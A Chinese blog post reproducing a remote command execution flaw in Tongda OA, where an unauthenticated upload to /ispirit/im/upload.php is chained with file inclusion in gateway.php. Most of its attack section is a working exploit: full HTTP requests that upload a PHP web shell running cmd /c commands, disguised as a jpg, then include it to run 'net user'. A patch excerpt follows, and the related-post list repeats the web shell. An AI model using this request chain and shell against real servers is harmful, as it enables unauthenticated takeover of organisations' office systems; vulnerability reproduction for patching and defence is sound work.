通达oa 不允许从该ip登陆_通达OA-命令执行漏洞复现

最新推荐文章于 2022-08-25 17:32:47 发布
最新推荐文章于 2022-08-25 17:32:47 发布
阅读量334 收藏
点赞数
文章标签: 通达oa 不允许从该ip登陆

ac52e6d642fc28edab50e06b4364400e.png

45e38477eac79a8a4263949916fed197.png

通达OA-命令执行

一、环境

安装文件:

链接:https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ 提取码:2b3i

da6c25f1e2bb1fa312bbbbd95732a4e7.png

二、漏洞验证

任意文件上传漏洞 /ispirit/im/upload.php

本地文件包含漏洞 /ispirit/interface/gateway.php

这两个路径不需要登录认证。

burp抓包修改数据包上传文件

POST /ispirit/im/upload.php HTTP/1.1

Host: 127.0.0.1:8080

Content-Length: 658

Cache-Control: no-cache

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB

Accept: */*

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5

Cookie: PHPSESSID=123

Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB

Content-Disposition: form-data; name="UPLOAD_MODE"

2

------WebKitFormBoundarypyfBh1YB4pV8McGB

Content-Disposition: form-data; name="P"

123

------WebKitFormBoundarypyfBh1YB4pV8McGB

Content-Disposition: form-data; name="DEST_UID"

1

------WebKitFormBoundarypyfBh1YB4pV8McGB

Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"

Content-Type: image/jpeg

$command=$_POST['cmd'];

$wsh = new COM('WScript.shell');

$exec = $wsh->exec("cmd /c ".$command);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

------WebKitFormBoundarypyfBh1YB4pV8McGB--

上传成功

ad0636761946ac4263a285617062c38c.png

查看返回数据包

HTTP/1.1200OKServer: nginxDate: Wed, 18 Mar 2020 12:12:58 GMTContent-Type: text/html; charset=gbkConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID=123; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Frame-Options: SAMEORIGINContent-Length: 41​+OK[vm]143263@2003_1787828218|jpg|0[/vm]

文件包含的filename=2003/1787828218.jpg

继续修改数据包 包含前面的文件名称,并且执行系统命令

POST/mac/gateway.phpHTTP/1.1Host: 127.0.0.1:8080Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 74Content-Type: application/x-www-form-urlencoded​​json={"url":"/general/../../attach/im/2003/1787828218.jpg"}&cmd=net user

命令执行成功

e53d18cbf709c5aa85e42cb0f6da1c3d.png

上面验证方式是通过burp抓包验证成功

下面通过python脚本验证:

b6031cf59c09ea0bf5465301bdcd1882.png

成功命令执行

三、修复代码

补丁修复 /ispirit/im/upload.php

原文件代码:

set_time_limit(0);

$P = $_POST['P'];

if (isset($P) || $P != '') {

ob_start();

include_once 'inc/session.php';

session_id($P);

session_start();

session_write_close();

} else {

include_once './auth.php';

}

修改后代码

删掉了else判断,直接包含/auth.php

//lp 2012/11/29 1:26:01 兼容客户端提交数据时无session的情况

if(isset($P) || $P!="")

{

ob_start();

include_once("inc/session.php");

session_id($P);

session_start();

session_write_close();

}

include_once("./auth.php");

auth.php

这里就直接判断用的是否登录

include_once 'inc/session.php';

session_start();

session_write_close();

include_once 'inc/conn.php';

include_once 'inc/utility.php';

ob_start();

if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {

sleep(1);

if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {

echo '-ERR ' . _('用户未登陆');

exit;

}

}

四、参考文档

https://github.com/jas502n/OA-tongda-RCE

https://www.cnblogs.com/potatsoSec/p/12516234.html

​公众号:

f620091c2c962b6ba5861260b9305ab9.png

thelostworld:

dd74608ad421380ce25310e83baecd39.png

个人知乎​:https://www.zhihu.com/people/fu-wei-43-69/columns

​个人简书:https://www.jianshu.com/u/bf0e38a8d400

weixin_39562615
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通达OA后台ispirit任意文件上传
xiaokp7的博客
07-30 390
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,ispirit/im/upload.php文件存在任意文件上传,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
weixin_50698958的博客
10-05 266
一、概述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 参考: https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 二、漏洞环境 路径:vulhub/httpd/CVE-2017-15715 启动环境:docker-compose up -d 访.
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
使用网络位置限制,保护公司数据安全
OneAuth身份云
08-25 277
IP 限制策略通常是一组组合,例如定义的 IP 范围或单个 IP 地址和时间,因此 IP 限制解决方案允许管理员或组织所有者将单个用户限制为一个或多个预定义的 IP 地址。因此,启用 IP 限制可确保您的重要数据无法在不安全的公共场所或通过未注册的 IP 地址访问。通常,当用户尝试登录/访问其帐户时,IP 限制解决方案会根据允许列表评估登录请求的 IP 地址。如果您不知道您的 IP 地址,您可以通过百度键入“ IP ”来检查您的 IP 地址。动态 IP – 用户每次连接到网络时,IP 地址可能会有所不同。
通达oa允许从该ip登陆_通达OA RCE
weixin_39567169的博客
11-28 276
安装下载通达OA安装包进行安装。下载链接:链接: https://pan.baidu.com/s/1tSuxT3N2zdEPwGH07-pmRw 密码:t9s3安装完成后会自动打开页面。漏洞利用# _*_ coding utf-8 _*_# author:return0;import requeststarget="http://10.211.55.5"payload=""print(...
漏洞通达OA命令执行
weixin_44508748的博客
03-24 1344
** 前言 ** 在受影响的版本中,攻击者可以在未认证的情况下向服务器上传jpg图片文件,然后包含该文件,造成远程代码执行。该漏洞无需登录即可触发。 漏洞影响版本 - V 11版 - 2017版 - 2016版 - 2015版 - 2013增强版 - 2013版 环境搭建 安装包下载链接: 链接: https://pan.baidu.com/s/1sDvS3nbZj2qOk...
外部系统无法访问OA,配置白名单(前提:有安全补丁包)
余大冠子的博客
09-18 1831
需要将OA系统的访问方式加入到白名单中,具体可以添加到附件《weaver_security_custom_rules_host_20180521.xml》 注:如果有多种访问方式,如端口不同、域名不同、IP和域名都属于不同的访问方式,需要一并加入。 <?xml version="1.0" encoding="UTF-8"?> <root> <ref-list> <ref>http://120.32.30.254</ref> &l
通达OA11.4漏洞(未授权访问)
weixin_51716781的博客
05-10 1412
通达OA11.4漏洞(未授权访问) 本文章仅限于渗透测试使用,如出问题与作者无关,请不要做违法操作 1:在虚拟机上安装通达OA11.4版本,查看虚拟机ip 192.168.78.159 2:访问ispirit/login_code.php 获取codeuid 如图:记住UID后面使用 3:访问/logincheck_code.php文件并使用bp抓包 4:在bp中需要修改数据:2个地方:1:修改为POST包,添加UID(注意事项:返回的包中status返回是1则成功,如果是0则失败) 5:把获取的
通达OA 任意文件上传+文件包含导致RCE
Adminxe的博客
09-23 1312
0x00 漏洞描述 ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell 0x01 漏洞影响版本 通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.1...
通达+oa+php+文件+乱,通达OA文件上传+文件包含get shell
weixin_34338129的博客
03-17 1241
一、原理1.文件上传漏洞位置:/ispirit/im/upload.php(1) 身份绕过如果设置了P参数,则跳过auth.php:(2) 文件上传:上传过滤了php,因为通达oa一般使用的是windows,所以可以使用php.绕过。不过由于上传目录不在根目录,所以还是需要进行文件包含。2.文件包含漏洞位置:/ispirit/interface/gateway.php(2013版)/mac/gat...
OA-tongda-RCE:Office Anywhere网络智能办公系统
03-11
OA-通达-RCE | Office Anywhere网络智能办公系统 后台Getshell 无需身份认证 任意文件上传防御/ispirit/im/upload.php 本地文件包含漏洞/ispirit/interface/gateway.php 命令执行绕过: <?php $command=$_POST['cmd']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> GetWebshel​​l <?php $fp = fopen('readme.php', 'w'); $a = base64_decode("PD9waHAKQGV
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
td.rar_http server_td-scdma_vmeet.php_zlch_通达OA
09-19
1. 首先安装好通达OA(默认OA安装目录是d:\MYOA,以下说明以此为准)。 2. 下载以下文件,并安装至OA安装目录(也可以使用正式版光盘中的安装文件): http://www.zlchat.com/oa/zlchat2_tdoa.rar 3. 运行通达...
通达OA header身份认证绕过漏洞利用工具
最新发布
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达+oa+php+文件+乱,通达OA 任意文件上传+文件包含导致RCE
weixin_30465829的博客
03-17 851
0x00 漏洞描述ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell0x01 漏洞影响版本通达OA V11版 <= 11.3 20200103通达OA 2017版 <= 10.19 20190522通达OA 2016...
通达OA 漏洞分析
BlusKing
03-19 9523
漏洞通报信息: https://mp.weixin.qq.com/s/_bpg8buT92dzRuGdr2ZrRg https://mp.weixin.qq.com/s/s1yqJNOsCk-uVyCtg6SG7A OA-2017非官网:http://www.downxia.com/downinfo/202980.html 最新版v11下载地址:http://www.tongda20...
通达oa wbupload.php,通达OA未授权文件上传&任意文件包含导致RCE分析
weixin_33330762的博客
03-11 571
影响范围V11.3版2017版2016版2015版2013版2013增强版漏洞简介通过未授权访问进入上传点上传图片马,使用任意文件包含getshell漏洞分析未授权访问文件上传漏洞点位于/ispirit/im/upload.php,首先看到如下代码$P = $_POST["P"];if (isset($P) || ($P != "")) {ob_start();include_once "inc/...
通达OA任意文件上传+文件包含GetShell
爱国小白帽
03-28 4315
通达OA任意文件上传+文件包含GetShell 原创 li9hu [Timeline Sec](javascript:void(0)???? 昨天 本公众号专注于最新漏洞,欢迎关注! ------------------------------------------------------------------------------------ 本文作者:li9hu(Timeline Sec...
通达oa 下载接口漏洞
12-08
通达OA是一款办公自动化系统,用于企业的办公管理和文件协作。...总之,通达OA下载接口漏洞是一项安全隐患,需要公司和通达OA的开发者共同合作,采取有效的措施加固系统安全,保护公司的重要文件和数据不被泄露。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值